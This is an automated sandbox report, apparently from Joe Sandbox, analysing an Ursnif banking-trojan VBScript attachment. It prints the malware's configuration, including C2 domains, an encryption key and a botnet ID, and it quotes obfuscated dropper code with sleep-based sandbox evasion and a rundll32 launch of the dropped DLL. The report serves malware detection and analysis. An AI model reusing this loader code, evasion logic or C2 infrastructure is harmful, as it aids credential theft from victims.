Play interactive tour

Edit tour

Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name:	Attachment_32954.vbs
Analysis ID:	384531
MD5:	39eb3427fd329de93a19190d84273710
SHA1:	5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256:	adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags:	vbs
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Deletes itself after installation

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found potential string decryption / allocating functions

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

wscript.exe (PID: 5540 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

rundll32.exe (PID: 6488 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4072 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.rundll32.exe.70250000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
20.3.rundll32.exe.bca25e.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 20.2.rundll32.exe.48f94a0.3.raw.unpack

Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	Metadefender: Detection: 25%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Show sources

Source: Attachment_32954.vbs	Virustotal: Detection: 36%	Perma Link
Source: Attachment_32954.vbs	Metadefender: Detection: 16%	Perma Link
Source: Attachment_32954.vbs	ReversingLabs: Detection: 31%

Source:

Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A088D FindFirstFileExW,

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7025161B GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702515D9 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702523C5 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCB159 NtQueryVirtualMemory,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702521A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC28E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCAF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A466E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70290FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A7120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029BA3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AA29E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AA3BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A75B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029B7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AB7DF

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 70294250 appears 39 times

Source: Attachment_32954.vbs

Initial sample: Strings found which are bigger than 50

Source: Rabin.dmg.1.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal92.troj.evad.winVBS@5/8@0/0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer

Source: Attachment_32954.vbs	Virustotal: Detection: 36%
Source: Attachment_32954.vbs	Metadefender: Detection: 16%
Source: Attachment_32954.vbs	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: Attachment_32954.vbs

Static file information: File size 1444626 > 1048576

Source:

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep 7000End With' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand heredity = 0REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant grove = 1000Do While heredity < 100000000REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau If (heredity = 100000000) ThenWScript.Quit' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges End IfIf (heredity = 5000000) Thengrove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))End IfIf (heredity = 200) ThenExit DoEnd ifREM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman heredity = heredity + 1LoopREM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara With WScript.Sleep 5000End WithEnd FunctionFunction hideout655()REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo If (InStr(WScript.ScriptName, "TESTING") > 0) ThenREM Iliad rennet manioc. visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking MsgBOX("RUN")Exit FunctionEnd Ifmoan("1")Set restaurant = CreateObject("WScript.Shell")restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"prime623End FunctionFunction artful(dermatology, stagnant)Dim Byronic, deviateSet Byronic = CreateObject("Scripting.FileSystemObject")Set deviate = Byronic.CreateTextFile(dermatology, True)Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))For Each soulful In stagnantREM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch RandomizeREM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Thendeviate.WriteLine(soulful)ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Thendeviate.Write soulful + ":"Elsedeviate.Write soulfuldeviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))End IfNextdeviate.Close' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill End FunctionFunction Gerhard()on error resume next' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649 Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70252193 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70252140 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCABF0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCAF23 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70264AB7 push ebx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70265B21 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70266BBB push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702ABF08 push ecx; ret

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\attachment_32954.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\wscript.exe TID: 4120

Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A088D FindFirstFileExW,

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A045B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A048C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C204F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C1C56 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: Rabin.dmg.1.dr

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer

Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DCA12A cpuid

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoEx,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesEx,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting121	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Security Software Discovery12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting121	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	File and Directory Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Information Discovery45	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Attachment_32954.vbs	37%	Virustotal		Browse
Attachment_32954.vbs	17%	Metadefender		Browse
Attachment_32954.vbs	31%	ReversingLabs	Script-WScript.Trojan.Banker

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Rabin.dmg	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Rabin.dmg	25%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Rabin.dmg	72%	ReversingLabs	Win32.Trojan.Tnega

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
20.2.rundll32.exe.dc0000.2.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384531
Start date:	09.04.2021
Start time:	11:43:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Attachment_32954.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winVBS@5/8@0/0
EGA Information:	Failed
